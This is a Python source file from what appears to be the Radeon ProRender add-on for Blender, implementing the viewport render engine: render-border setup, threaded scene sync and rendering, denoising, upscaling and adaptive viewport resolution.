viewport_engine.py
#**********************************************************************
# Copyright 2020 Advanced Micro Devices, Inc
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#********************************************************************
import threading
import time
import math
from dataclasses import dataclass
import traceback
import textwrap
import bpy
import bgl
from gpu_extras.presets import draw_texture_2d
from bpy_extras import view3d_utils
import pyrpr
from .engine import Engine
from . import image_filter
from rprblender.export import camera, material, world, object, instance
from rprblender.export.mesh import assign_materials
from rprblender.utils import gl
from rprblender import utils
from rprblender.utils.user_settings import get_user_settings
from rprblender.utils import logging
log = logging.Log(tag='viewport_engine')
MIN_ADAPT_RATIO_DIFF = 0.2
MIN_ADAPT_RESOLUTION_RATIO_DIFF = 0.1
@dataclass(init=False, eq=True)
class ViewportSettings:
"""
Comparable dataclass which holds render settings for ViewportEngine:
- camera viewport settings
- render resolution
- screen resolution
- render border
"""
camera_data: camera.CameraData
screen_width: int
screen_height: int
border: tuple
def __init__(self, context: bpy.types.Context):
"""Initializes settings from Blender's context"""
self.camera_data = camera.CameraData.init_from_context(context)
self.screen_width, self.screen_height = context.region.width, context.region.height
scene = context.scene
# getting render border
x1, y1 = 0, 0
x2, y2 = self.screen_width, self.screen_height
if context.region_data.view_perspective == 'CAMERA':
if scene.render.use_border:
# getting border corners from camera view
# getting screen camera points
camera_obj = scene.camera
camera_points = camera_obj.data.view_frame(scene=scene)
screen_points = tuple(
view3d_utils.location_3d_to_region_2d(context.region,
context.space_data.region_3d,
camera_obj.matrix_world @ p)
for p in camera_points
)
# getting camera view region
x1 = min(p[0] for p in screen_points)
x2 = max(p[0] for p in screen_points)
y1 = min(p[1] for p in screen_points)
y2 = max(p[1] for p in screen_points)
# adjusting region to border
x, y = x1, y1
dx, dy = x2 - x1, y2 - y1
x1 = int(x + scene.render.border_min_x * dx)
x2 = int(x + scene.render.border_max_x * dx)
y1 = int(y + scene.render.border_min_y * dy)
y2 = int(y + scene.render.border_max_y * dy)
# adjusting to region screen resolution
x1 = max(min(x1, self.screen_width), 0)
x2 = max(min(x2, self.screen_width), 0)
y1 = max(min(y1, self.screen_height), 0)
y2 = max(min(y2, self.screen_height), 0)
else:
if context.space_data.use_render_border:
# getting border corners from viewport camera
x, y = x1, y1
dx, dy = x2 - x1, y2 - y1
x1 = int(x + context.space_data.render_border_min_x * dx)
x2 = int(x + context.space_data.render_border_max_x * dx)
y1 = int(y + context.space_data.render_border_min_y * dy)
y2 = int(y + context.space_data.render_border_max_y * dy)
# getting render resolution and render border
width, height = x2 - x1, y2 - y1
self.border = (x1, y1), (width, height)
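# Worked example of the border math above (hypothetical numbers, not taken
# from the add-on): for a 1920x1080 region with a viewport render border of
# min = (0.25, 0.25) and max = (0.75, 0.75), the code yields
#   x1 = int(0 + 0.25 * 1920) = 480,  x2 = int(0 + 0.75 * 1920) = 1440
#   y1 = int(0 + 0.25 * 1080) = 270,  y2 = int(0 + 0.75 * 1080) = 810
# so self.border == ((480, 270), (960, 540)), i.e. a 960x540 render region.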
def export_camera(self, rpr_camera):
"""Exports camera settings with render border"""
self.camera_data.export(rpr_camera,
((self.border[0][0] / self.screen_width, self.border[0][1] / self.screen_height),
(self.border[1][0] / self.screen_width, self.border[1][1] / self.screen_height)))
@property
def width(self):
return self.border[1][0]
@property
def height(self):
return self.border[1][1]
@dataclass(init=False, eq=True)
class ShadingData:
type: str
use_scene_lights: bool = True
use_scene_world: bool = True
studio_light: str = None
studio_light_rotate_z: float = 0.0
studio_light_background_alpha: float = 0.0
studio_light_intensity: float = 1.0
def __init__(self, context: bpy.types.Context):
shading = context.area.spaces.active.shading
self.type = shading.type
if self.type == 'RENDERED':
self.use_scene_lights = shading.use_scene_lights_render
self.use_scene_world = shading.use_scene_world_render
else:
self.use_scene_lights = shading.use_scene_lights
self.use_scene_world = shading.use_scene_world
if not self.use_scene_world:
self.studio_light = shading.selected_studio_light.path
if not self.studio_light:
self.studio_light = str(utils.blender_data_dir() /
"studiolights/world" / shading.studio_light)
self.studio_light_rotate_z = shading.studiolight_rotate_z
self.studio_light_background_alpha = shading.studiolight_background_alpha
if hasattr(shading, "studiolight_intensity"): # parameter added in Blender 2.81
self.studio_light_intensity = shading.studiolight_intensity
@dataclass(init=False, eq=True)
class ViewLayerSettings:
"""
Comparable dataclass which holds active view layer settings for ViewportEngine:
- override material
"""
material_override: bpy.types.Material = None
def __init__(self, view_layer: bpy.types.ViewLayer):
self.material_override = view_layer.material_override
class FinishRenderException(Exception):
pass
class ViewportEngine(Engine):
""" Viewport render engine """
TYPE = 'VIEWPORT'
def __init__(self, rpr_engine):
super().__init__(rpr_engine)
self.gl_texture = gl.GLTexture()
self.viewport_settings: ViewportSettings = None
self.world_settings: world.WorldData = None
self.shading_data: ShadingData = None
self.view_layer_data: ViewLayerSettings = None
self.sync_render_thread: threading.Thread = None
self.restart_render_event = threading.Event()
self.render_lock = threading.Lock()
self.is_finished = False
self.is_synced = False
self.is_rendered = False
self.is_resized = False
self.denoised_image = None
self.upscaled_image = None
self.requested_adapt_ratio = None
self.is_resolution_adapted = False
self.width = 1
self.height = 1
self.render_iterations = 0
self.render_time = 0
self.view_mode = None
self.use_contour = False
self.space_data = None
self.selected_objects = None
self.user_settings = get_user_settings()
def stop_render(self):
self.is_finished = True
self.restart_render_event.set()
self.sync_render_thread.join()
self.rpr_context = None
self.image_filter = None
def _resolve(self):
self.rpr_context.resolve()
def notify_status(self, info, status):
""" Display export progress status """
wrap_info = textwrap.fill(info, 120)
self.rpr_engine.update_stats(status, wrap_info)
log(status, wrap_info)
# requesting blender to call draw()
self.rpr_engine.tag_redraw()
def _do_sync(self, depsgraph):
# SYNCING OBJECTS AND INSTANCES
self.notify_status("Starting...", "Sync")
time_begin = time.perf_counter()
self.use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
# exporting objects
frame_current = depsgraph.scene.frame_current
material_override = depsgraph.view_layer.material_override
objects_len = len(depsgraph.objects)
for i, obj in enumerate(self.depsgraph_objects(depsgraph)):
if self.is_finished:
raise FinishRenderException
time_sync = time.perf_counter() - time_begin
self.notify_status(f"Time {time_sync:.1f} | Object ({i}/{objects_len}): {obj.name}",
"Sync")
indirect_only = obj.original.indirect_only_get(view_layer=depsgraph.view_layer)
object.sync(self.rpr_context, obj,
indirect_only=indirect_only, material_override=material_override,
frame_current=frame_current, use_contour=self.use_contour)
# exporting instances
instances_len = len(depsgraph.object_instances)
last_instances_percent = 0
for i, inst in enumerate(self.depsgraph_instances(depsgraph)):
if self.is_finished:
raise FinishRenderException
instances_percent = (i * 100) // instances_len
if instances_percent > last_instances_percent:
time_sync = time.perf_counter() - time_begin
self.notify_status(f"Time {time_sync:.1f} | Instances {instances_percent}%", "Sync")
last_instances_percent = instances_percent
indirect_only = inst.parent.original.indirect_only_get(view_layer=depsgraph.view_layer)
instance.sync(self.rpr_context, inst,
indirect_only=indirect_only, material_override=material_override,
frame_current=frame_current, use_contour=self.use_contour)
# shadow catcher
self.rpr_context.sync_catchers(depsgraph.scene.render.film_transparent)
self.is_synced = True
def _do_render(self):
# RENDERING
self.notify_status("Starting...", "Render")
is_adaptive = self.rpr_context.is_aov_enabled(pyrpr.AOV_VARIANCE)
MIN_DENOISE_ITERATION = 4
MAX_DENOISE_ITERATION_STEP = 32
# Infinite loop which starts when the scene has to be re-rendered.
# It waits for restart_render_event to be set.
# Exit from this loop is implemented by raising FinishRenderException
# when self.is_finished is set from the main thread.
while True:
self.restart_render_event.wait()
if self.is_finished:
raise FinishRenderException
# preparations to start rendering
iteration = 0
time_begin = 0.0
time_render = 0.0
if is_adaptive:
all_pixels = active_pixels = self.rpr_context.width * self.rpr_context.height
is_last_iteration = False
next_denoise_iteration = MIN_DENOISE_ITERATION
# this loop renders one iteration at a time
while True:
if self.is_finished:
raise FinishRenderException
is_adaptive_active = is_adaptive and iteration >= self.rpr_context.get_parameter(
pyrpr.CONTEXT_ADAPTIVE_SAMPLING_MIN_SPP)
if self.restart_render_event.is_set():
# clears restart_render_event, prepares to start rendering
self.restart_render_event.clear()
iteration = 0
if self.is_resized:
if not self.rpr_context.gl_interop:
# When gl_interop is not enabled, it is better to do the resize in
# this thread. This is important for Hybrid.
with self.render_lock:
self.rpr_context.resize(self.width, self.height)
self.is_resized = False
self.denoised_image = None
self.upscaled_image = None
self.rpr_context.sync_auto_adapt_subdivision()
self.rpr_context.sync_portal_lights()
time_begin = time.perf_counter()
log(f"Restart render [{self.width}, {self.height}]")
# rendering
with self.render_lock:
if self.restart_render_event.is_set():
break
self.rpr_context.set_parameter(pyrpr.CONTEXT_FRAMECOUNT, iteration)
self.rpr_context.render(restart=(iteration == 0))
iteration += 1
# denoising if needed
if self.image_filter and iteration == next_denoise_iteration:
self._resolve()
self.update_image_filter_inputs()
self.image_filter.run()
self.denoised_image = self.image_filter.get_data()
# doubling next_denoise_iteration, but increasing it
# by no more than MAX_DENOISE_ITERATION_STEP
next_denoise_iteration += min(next_denoise_iteration,
MAX_DENOISE_ITERATION_STEP)
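# Resulting schedule (derived from the constants above): with
# MIN_DENOISE_ITERATION = 4 and MAX_DENOISE_ITERATION_STEP = 32 the denoiser
# runs at iterations 4, 8, 16, 32, 64, 96, 128, ... i.e. the interval doubles
# until it is capped at 32 iterations between denoising passes.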
if is_adaptive_active:
active_pixels = self.rpr_context.get_info(pyrpr.CONTEXT_ACTIVE_PIXEL_COUNT, int)
self.is_rendered = True
# checking for last iteration
# preparing information to show in viewport
time_render_prev = time_render
time_render = time.perf_counter() - time_begin
iteration_time = time_render - time_render_prev
if not self.is_resolution_adapted and iteration == 2:
target_time = 1.0 / self.user_settings.viewport_samples_per_sec
self.requested_adapt_ratio = target_time / iteration_time
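# Example with hypothetical numbers: viewport_samples_per_sec = 10 gives a
# target of 0.1 s per iteration; if the second iteration took 0.2 s, then
# requested_adapt_ratio = 0.1 / 0.2 = 0.5, asking draw() to roughly halve
# the rendered pixel count via _adapt_resize().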
if self.render_iterations > 0:
info_str = f"Time: {time_render:.1f} sec" \
f" | Iteration: {iteration}/{self.render_iterations}"
else:
info_str = f"Time: {time_render:.1f}/{self.render_time} sec" \
f" | Iteration: {iteration}"
if is_adaptive_active:
adaptive_progress = max((all_pixels - active_pixels) / all_pixels, 0.0)
info_str += f" | Adaptive Sampling: {math.floor(adaptive_progress * 100)}%"
if self.denoised_image is not None:
info_str += " | Denoised"
if self.render_iterations > 0:
if iteration >= self.render_iterations:
is_last_iteration = True
else:
if time_render >= self.render_time:
is_last_iteration = True
if is_adaptive and active_pixels == 0:
is_last_iteration = True
if is_last_iteration:
break
self.notify_status(info_str, "Render")
# notifying viewport that rendering is finished
if is_last_iteration:
with self.render_lock:
if self.image_filter:
# applying denoising
self._resolve()
self.update_image_filter_inputs()
self.image_filter.run()
self.denoised_image = self.image_filter.get_data()
if self.upscale_filter:
self.upscale_filter.update_input('color', self.denoised_image)
self.upscale_filter.run()
self.upscaled_image = self.upscale_filter.get_data()
elif self.upscale_filter:
self._resolve()
color = self.rpr_context.get_image()
self.upscale_filter.update_input('color', color)
self.upscale_filter.run()
self.upscaled_image = self.upscale_filter.get_data()
time_render = time.perf_counter() - time_begin
info_str = f"Time: {time_render:.1f} sec | Iteration: {iteration}"
if self.denoised_image is not None:
info_str += " | Denoised"
if self.upscaled_image is not None:
info_str += " | Upscaled"
self.notify_status(info_str, "Rendering Done")
def _do_sync_render(self, depsgraph):
"""
Thread function for self.sync_render_thread. It always runs during viewport render.
When it is not rendering, it waits for self.restart_render_event.
"""
try:
self._do_sync(depsgraph)
self._do_render()
except FinishRenderException:
log("Finish by user")
except Exception as e:
log.error(e, 'EXCEPTION:', traceback.format_exc())
self.is_finished = True
# notifying viewport about error
self.notify_status(f"{e}.\nPlease see logs for more details.", "ERROR")
log("Finish _do_sync_render")
def sync(self, context, depsgraph):
log('Start sync')
scene = depsgraph.scene
viewport_limits = scene.rpr.viewport_limits
view_layer = depsgraph.view_layer
settings = get_user_settings()
use_gl_interop = settings.use_gl_interop and not scene.render.film_transparent
use_contour = scene.rpr.is_contour_used(is_final_engine=False)
scene.rpr.init_rpr_context(self.rpr_context, is_final_engine=False,
use_gl_interop=use_gl_interop,
use_contour_integrator=use_contour)
self.rpr_context.blender_data['depsgraph'] = depsgraph
self.shading_data = ShadingData(context)
self.view_layer_data = ViewLayerSettings(view_layer)
# setting initial render resolution as (1, 1) just for AOV creation.
# It will be resized to the correct resolution in the draw() function
self.rpr_context.resize(1, 1)
self.rpr_context.enable_aov(pyrpr.AOV_COLOR)
if viewport_limits.noise_threshold > 0.0:
# if adaptive sampling is enabled, turn on the AOV and set its parameters
self.rpr_context.enable_aov(pyrpr.AOV_VARIANCE)
viewport_limits.set_adaptive_params(self.rpr_context)
self.rpr_context.scene.set_name(scene.name)
self.world_settings = self._get_world_settings(depsgraph)
self.world_settings.export(self.rpr_context)
if scene.rpr.is_contour_used(is_final_engine=False):
scene.rpr.export_contour_mode(self.rpr_context)
rpr_camera = self.rpr_context.create_camera()
rpr_camera.set_name("Camera")
self.rpr_context.scene.set_camera(rpr_camera)
# image filter
self.setup_image_filter(self._get_image_filter_settings())
# upscale filter
self.setup_upscale_filter({
'enable': settings.viewport_denoiser_upscale,
'resolution': (self.width, self.height),
})
# other context settings
self.rpr_context.set_parameter(pyrpr.CONTEXT_PREVIEW, True)
self.rpr_context.set_parameter(pyrpr.CONTEXT_ITERATIONS, 1)
scene.rpr.export_render_mode(self.rpr_context)
scene.rpr.export_ray_depth(self.rpr_context)
scene.rpr.export_pixel_filter(self.rpr_context)
self.render_iterations, self.render_time = (viewport_limits.max_samples, 0)
self.is_finished = False
self.restart_render_event.clear()
self.view_mode = context.mode
self.use_contour = scene.rpr.is_contour_used(is_final_engine=False)
self.space_data = context.space_data
self.selected_objects = context.selected_objects
self.sync_render_thread = threading.Thread(target=self._do_sync_render, args=(depsgraph,))
self.sync_render_thread.start()
log('Finish sync')
def sync_update(self, context, depsgraph):
""" sync just the updated things """
if not self.is_synced:
return
if context.selected_objects != self.selected_objects:
# only a selection change
self.selected_objects = context.selected_objects
return
frame_current = depsgraph.scene.frame_current
# get supported updates and sort by priorities
updates = []
for obj_type in (bpy.types.Scene, bpy.types.World, bpy.types.Material, bpy.types.Object,
bpy.types.Collection, bpy.types.Light):
updates.extend(update for update in depsgraph.updates if isinstance(update.id, obj_type))
sync_collection = False
sync_world = False
is_updated = False
is_obj_updated = False
material_override = depsgraph.view_layer.material_override
shading_data = ShadingData(context)
if self.shading_data != shading_data:
sync_world = True
if self.shading_data.use_scene_lights != shading_data.use_scene_lights:
sync_collection = True
self.shading_data = shading_data
self.rpr_context.blender_data['depsgraph'] = depsgraph
# if the view mode changed, we need to sync collections
use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
mode_updated = False
if self.view_mode != context.mode or self.use_contour != use_contour:
self.view_mode = context.mode
self.use_contour = use_contour
mode_updated = True
if not updates and not sync_world and not sync_collection:
return
self._sync_update_before()
with self.render_lock:
for update in updates:
obj = update.id
log("sync_update", obj)
if isinstance(obj, bpy.types.Scene):
is_updated |= self.update_render(obj, depsgraph.view_layer)
# An Outliner object visibility change provides only a bpy.types.Scene update.
# That's why we need to sync the objects collection at the end
sync_collection = True
if is_updated:
self.is_resolution_adapted = not self.user_settings.adapt_viewport_resolution
continue
if isinstance(obj, bpy.types.Material):
is_updated |= self.update_material_on_scene_objects(obj, depsgraph)
continue
if isinstance(obj, bpy.types.Object):
if obj.type == 'CAMERA':
continue
indirect_only = obj.original.indirect_only_get(view_layer=depsgraph.view_layer)
active_and_mode_changed = mode_updated and context.active_object == obj.original
is_updated |= object.sync_update(self.rpr_context, obj,
update.is_updated_geometry or active_and_mode_changed,
update.is_updated_transform,
indirect_only=indirect_only,
material_override=material_override,
frame_current=frame_current,
use_contour=self.use_contour)
is_obj_updated |= is_updated
continue
if isinstance(obj, bpy.types.Light):
light = obj
for obj in self.depsgraph_objects(depsgraph):
if obj.data == light:
is_updated |= object.sync_update(self.rpr_context, obj, True, False)
if isinstance(obj, bpy.types.World):
sync_world = True
if isinstance(obj, bpy.types.Collection):
sync_collection = True
continue
if sync_world:
world_settings = self._get_world_settings(depsgraph)
if self.world_settings != world_settings:
self.world_settings = world_settings
self.world_settings.export(self.rpr_context)
is_updated = True
if sync_collection:
is_updated |= self.sync_objects_collection(depsgraph)
if is_obj_updated:
self.rpr_context.sync_catchers()
if is_updated:
self.restart_render_event.set()
self._sync_update_after()
def _sync_update_before(self):
pass
def _sync_update_after(self):
pass
@staticmethod
def _draw_texture(texture_id, x, y, width, height):
# INITIALIZATION
# Getting shader program
shader_program = bgl.Buffer(bgl.GL_INT, 1)
bgl.glGetIntegerv(bgl.GL_CURRENT_PROGRAM, shader_program)
# Generate vertex array
vertex_array = bgl.Buffer(bgl.GL_INT, 1)
bgl.glGenVertexArrays(1, vertex_array)
texturecoord_location = bgl.glGetAttribLocation(shader_program[0], "texCoord")
position_location = bgl.glGetAttribLocation(shader_program[0], "pos")
# Generate geometry buffers for drawing textured quad
position = [x, y, x + width, y, x + width, y + height, x, y + height]
position = bgl.Buffer(bgl.GL_FLOAT, len(position), position)
texcoord = [0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 0.0, 1.0]
texcoord = bgl.Buffer(bgl.GL_FLOAT, len(texcoord), texcoord)
vertex_buffer = bgl.Buffer(bgl.GL_INT, 2)
bgl.glGenBuffers(2, vertex_buffer)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, vertex_buffer[0])
bgl.glBufferData(bgl.GL_ARRAY_BUFFER, 32, position, bgl.GL_STATIC_DRAW)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, vertex_buffer[1])
bgl.glBufferData(bgl.GL_ARRAY_BUFFER, 32, texcoord, bgl.GL_STATIC_DRAW)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, 0)
# DRAWING
bgl.glActiveTexture(bgl.GL_TEXTURE0)
bgl.glBindTexture(bgl.GL_TEXTURE_2D, texture_id)
bgl.glBindVertexArray(vertex_array[0])
bgl.glEnableVertexAttribArray(texturecoord_location)
bgl.glEnableVertexAttribArray(position_location)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, vertex_buffer[0])
bgl.glVertexAttribPointer(position_location, 2, bgl.GL_FLOAT, bgl.GL_FALSE, 0, None)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, vertex_buffer[1])
bgl.glVertexAttribPointer(texturecoord_location, 2, bgl.GL_FLOAT, bgl.GL_FALSE, 0, None)
bgl.glBindBuffer(bgl.GL_ARRAY_BUFFER, 0)
bgl.glDrawArrays(bgl.GL_TRIANGLE_FAN, 0, 4)
bgl.glBindVertexArray(0)
bgl.glBindTexture(bgl.GL_TEXTURE_2D, 0)
# DELETING
bgl.glDeleteBuffers(2, vertex_buffer)
bgl.glDeleteVertexArrays(1, vertex_array)
def _get_render_image(self):
return self.rpr_context.get_image()
def draw_texture(self, texture_id, scene):
if scene.rpr.render_mode in ('WIREFRAME', 'MATERIAL_INDEX',
'POSITION', 'NORMAL', 'TEXCOORD'):
# Draw without color management
draw_texture_2d(texture_id, self.viewport_settings.border[0],
*self.viewport_settings.border[1])
else:
# Bind shader that converts from scene linear to display space,
bgl.glEnable(bgl.GL_BLEND)
bgl.glBlendFunc(bgl.GL_ONE, bgl.GL_ONE_MINUS_SRC_ALPHA)
self.rpr_engine.bind_display_space_shader(scene)
# note this has to draw to region size, not scaled down size
self._draw_texture(texture_id, *self.viewport_settings.border[0],
*self.viewport_settings.border[1])
self.rpr_engine.unbind_display_space_shader()
bgl.glDisable(bgl.GL_BLEND)
def _draw(self, scene):
im = self.upscaled_image
if im is not None:
self.gl_texture.set_image(im)
self.draw_texture(self.gl_texture.texture_id, scene)
return
im = self.denoised_image
if im is not None:
self.gl_texture.set_image(im)
self.draw_texture(self.gl_texture.texture_id, scene)
return
with self.render_lock:
self._resolve()
if self.rpr_context.gl_interop:
self.draw_texture(self.rpr_context.get_frame_buffer().texture_id, scene)
return
im = self._get_render_image()
self.gl_texture.set_image(im)
self.draw_texture(self.gl_texture.texture_id, scene)
def draw(self, context):
log("Draw")
if not self.is_synced or self.is_finished:
return
# initializing self.viewport_settings and requesting first self.restart_render_event
with self.render_lock:
if not self.viewport_settings:
self.viewport_settings = ViewportSettings(context)
self.viewport_settings.export_camera(self.rpr_context.scene.camera)
self._resize(*self._get_resolution())
self.is_resolution_adapted = not self.user_settings.adapt_viewport_resolution
self.restart_render_event.set()
if not self.is_rendered:
return
self._draw(context.scene)
# checking for viewport updates: setting camera position and resizing
with self.render_lock:
viewport_settings = ViewportSettings(context)
if viewport_settings.width * viewport_settings.height == 0:
return
if self.viewport_settings != viewport_settings:
self.viewport_settings = viewport_settings
self.viewport_settings.export_camera(self.rpr_context.scene.camera)
if self.user_settings.adapt_viewport_resolution:
self._adapt_resize(*self._get_resolution(),
self.user_settings.min_viewport_resolution_scale * 0.01)
else:
self._resize(*self._get_resolution())
self.is_resolution_adapted = not self.user_settings.adapt_viewport_resolution
self.restart_render_event.set()
else:
if self.requested_adapt_ratio is not None:
self._adapt_resize(*self._get_resolution(),
self.user_settings.min_viewport_resolution_scale * 0.01,
self.requested_adapt_ratio)
self.requested_adapt_ratio = None
self.is_resolution_adapted = True
elif not self.user_settings.adapt_viewport_resolution:
self._resize(*self._get_resolution())
if self.is_resized:
self.restart_render_event.set()
def _resize(self, width, height):
if self.width == width and self.height == height:
self.is_resized = False
return
self.width = width
self.height = height
if self.rpr_context.gl_interop:
# The GL framebuffer has to be recreated in this thread,
# that's why we call resize here
self.rpr_context.resize(self.width, self.height)
if self.image_filter:
image_filter_settings = self.image_filter.settings.copy()
image_filter_settings['resolution'] = self.width, self.height
self.setup_image_filter(image_filter_settings)
if self.upscale_filter:
upscale_filter_settings = self.upscale_filter.settings.copy()
upscale_filter_settings['resolution'] = self.width, self.height
self.setup_upscale_filter(upscale_filter_settings)
if self.world_settings.backplate:
self.world_settings.backplate.export(self.rpr_context, (self.width, self.height))
self.is_resized = True
def _adapt_resize(self, max_w, max_h, min_scale, adapt_ratio=None):
# trying to keep the previous resolution, or approximately the same number of pixels
min_w = max(int(max_w * min_scale), 1)
min_h = max(int(max_h * min_scale), 1)
w, h = self.rpr_context.width, self.rpr_context.height
if adapt_ratio is None:
if abs(w / h - max_w / max_h) > MIN_ADAPT_RESOLUTION_RATIO_DIFF:
scale = math.sqrt(w * h / (max_w * max_h))
w, h = int(max_w * scale), int(max_h * scale)
else:
if abs(1.0 - adapt_ratio) > MIN_ADAPT_RATIO_DIFF:
scale = math.sqrt(adapt_ratio)
w, h = int(self.rpr_context.width * scale), \
int(self.rpr_context.height * scale)
else:
w, h = self.rpr_context.width, self.rpr_context.height
self._resize(min(max(w, min_w), max_w),
min(max(h, min_h), max_h))
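# Example with hypothetical numbers: a current 1000x500 buffer and
# adapt_ratio = 0.5 gives scale = sqrt(0.5) ~ 0.707, so the new size is about
# 707x353 (always clamped between the min_scale fraction of the viewport and
# the full viewport size). Ratios within MIN_ADAPT_RATIO_DIFF (0.2) of 1.0
# keep the current resolution unchanged.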
def _get_resolution(self, vs=None):
if not vs:
vs = self.viewport_settings
if self.upscale_filter:
return vs.width // 2, vs.height // 2
return vs.width, vs.height
def sync_objects_collection(self, depsgraph):
"""
Removes objects which are not present in depsgraph anymore.
Adds objects which are not present in rpr_context but existed in depsgraph
"""
res = False
view_layer_data = ViewLayerSettings(depsgraph.view_layer)
material_override = view_layer_data.material_override
# set of depsgraph object keys
depsgraph_keys = set.union(
set(object.key(obj) for obj in self.depsgraph_objects(depsgraph)),
set(instance.key(obj) for obj in self.depsgraph_instances(depsgraph))
)
# set of visible rpr object keys
rpr_object_keys = set(key for key, obj in self.rpr_context.objects.items()
if not isinstance(obj, pyrpr.Shape) or obj.is_visible)
# sets of objects keys to remove from rpr
object_keys_to_remove = rpr_object_keys - depsgraph_keys
# sets of objects keys to export into rpr
object_keys_to_export = depsgraph_keys - rpr_object_keys
if object_keys_to_remove:
log("Object keys to remove", object_keys_to_remove)
for obj_key in object_keys_to_remove:
if obj_key in self.rpr_context.objects:
self.rpr_context.remove_object(obj_key)
res = True
if object_keys_to_export:
log("Object keys to add", object_keys_to_export)
res |= self.sync_collection_objects(depsgraph, object_keys_to_export,
material_override)
res |= self.sync_collection_instances(depsgraph, object_keys_to_export,
material_override)
# update/remove material override on the rest of the scene objects
if view_layer_data != self.view_layer_data:
# update/remove material override on all other objects
self.view_layer_data = view_layer_data
res = True
rpr_mesh_keys = set(key for key, obj in self.rpr_context.objects.items()
if isinstance(obj, pyrpr.Mesh) and obj.is_visible)
unchanged_meshes_keys = tuple(e for e in depsgraph_keys if e in rpr_mesh_keys)
log("Object keys to update material override", unchanged_meshes_keys)
self.sync_collection_objects(depsgraph, unchanged_meshes_keys,
material_override)
rpr_instance_keys = set(key for key, obj in self.rpr_context.objects.items()
if isinstance(obj, pyrpr.Instance) and obj.is_visible)
unchanged_instances_keys = tuple(e for e in depsgraph_keys if e in rpr_instance_keys)
log("Instance keys to update material override", unchanged_instances_keys)
self.sync_collection_instances(depsgraph, unchanged_instances_keys,
material_override)
return res
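# Illustration of the key-set logic above (hypothetical keys): if the
# depsgraph now contains {A, B, C} and rpr_context currently shows {B, C, D},
# then D (= rpr_object_keys - depsgraph_keys) is removed and
# A (= depsgraph_keys - rpr_object_keys) is exported.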
def sync_collection_objects(self, depsgraph, object_keys_to_export, material_override):
""" Export collections objects """
res = False
frame_current = depsgraph.scene.frame_current
use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
for obj in self.depsgraph_objects(depsgraph):
obj_key = object.key(obj)
if obj_key not in object_keys_to_export:
continue
rpr_obj = self.rpr_context.objects.get(obj_key, None)
if not rpr_obj:
indirect_only = obj.original.indirect_only_get(view_layer=depsgraph.view_layer)
object.sync(self.rpr_context, obj,
indirect_only=indirect_only, material_override=material_override,
frame_current=frame_current, use_contour=use_contour)
else:
assign_materials(self.rpr_context, rpr_obj, obj, material_override)
res = True
return res
def sync_collection_instances(self, depsgraph, object_keys_to_export, material_override):
""" Export collections instances """
res = False
frame_current = depsgraph.scene.frame_current
use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
for inst in self.depsgraph_instances(depsgraph):
instance_key = instance.key(inst)
if instance_key not in object_keys_to_export:
continue
inst_obj = self.rpr_context.objects.get(instance_key, None)
if not inst_obj:
indirect_only = inst.parent.original.indirect_only_get(view_layer=depsgraph.view_layer)
instance.sync(self.rpr_context, inst,
indirect_only=indirect_only, material_override=material_override,
frame_current=frame_current, use_contour=use_contour)
else:
assign_materials(self.rpr_context, inst_obj, inst.object, material_override=material_override)
res = True
return res
def update_material_on_scene_objects(self, mat, depsgraph):
""" Find all mesh material users and reapply material """
material_override = depsgraph.view_layer.material_override
frame_current = depsgraph.scene.frame_current
use_contour = depsgraph.scene.rpr.is_contour_used(is_final_engine=False)
if material_override and material_override.name == mat.name:
objects = self.depsgraph_objects(depsgraph)
active_mat = material_override
else:
objects = tuple(obj for obj in self.depsgraph_objects(depsgraph)
if mat.name in obj.material_slots.keys())
active_mat = mat
updated = False
for obj in objects:
rpr_material = material.sync_update(self.rpr_context, active_mat, obj=obj)
rpr_volume = material.sync_update(self.rpr_context, active_mat, 'Volume', obj=obj)
rpr_displacement = material.sync_update(self.rpr_context, active_mat, 'Displacement', obj=obj)
if not rpr_material and not rpr_volume and not rpr_displacement:
continue
indirect_only = obj.original.indirect_only_get(view_layer=depsgraph.view_layer)
if object.key(obj) not in self.rpr_context.objects:
object.sync(self.rpr_context, obj, indirect_only=indirect_only,
frame_current=frame_current, use_contour=use_contour)
updated = True
continue
updated |= object.sync_update(self.rpr_context, obj, False, False,
indirect_only=indirect_only,
material_override=material_override,
frame_current=frame_current,
use_contour=use_contour)
return updated
def update_render(self, scene: bpy.types.Scene, view_layer: bpy.types.ViewLayer):
''' Updates settings if they changed during viewport render; returns True if a restart is needed '''
restart = scene.rpr.export_render_mode(self.rpr_context)
restart |= scene.rpr.export_ray_depth(self.rpr_context)
restart |= scene.rpr.export_pixel_filter(self.rpr_context)
render_iterations, render_time = (scene.rpr.viewport_limits.max_samples, 0)
if self.render_iterations != render_iterations or self.render_time != render_time:
self.render_iterations = render_iterations
self.render_time = render_time
restart = True
restart |= scene.rpr.viewport_limits.set_adaptive_params(self.rpr_context)
# image filter
if self.setup_image_filter(self._get_image_filter_settings()):
self.denoised_image = None
restart = True
restart |= self.setup_upscale_filter({
'enable': get_user_settings().viewport_denoiser_upscale,
'resolution': (self.width, self.height),
})
return restart
def _get_world_settings(self, depsgraph):
if self.shading_data.use_scene_world:
return world.WorldData.init_from_world(depsgraph.scene.world)
return world.WorldData.init_from_shading_data(self.shading_data)
def _get_image_filter_settings(self):
return {
'enable': get_user_settings().viewport_denoiser_upscale,
'resolution': (self.width, self.height),
'filter_type': 'ML',
'ml_color_only': False,
'ml_use_fp16_compute_type': True,
}
def depsgraph_objects(self, depsgraph, with_camera=False):
for obj in super().depsgraph_objects(depsgraph, with_camera):
if obj.type == 'LIGHT' and not self.shading_data.use_scene_lights:
continue
# check for local view visibility
if not obj.visible_in_viewport_get(self.space_data):
continue
yield obj
def depsgraph_instances(self, depsgraph):
for instance in super().depsgraph_instances(depsgraph):
# check for local view visibility
if not instance.parent.visible_in_viewport_get(self.space_data):
continue
yield instance
camera.py
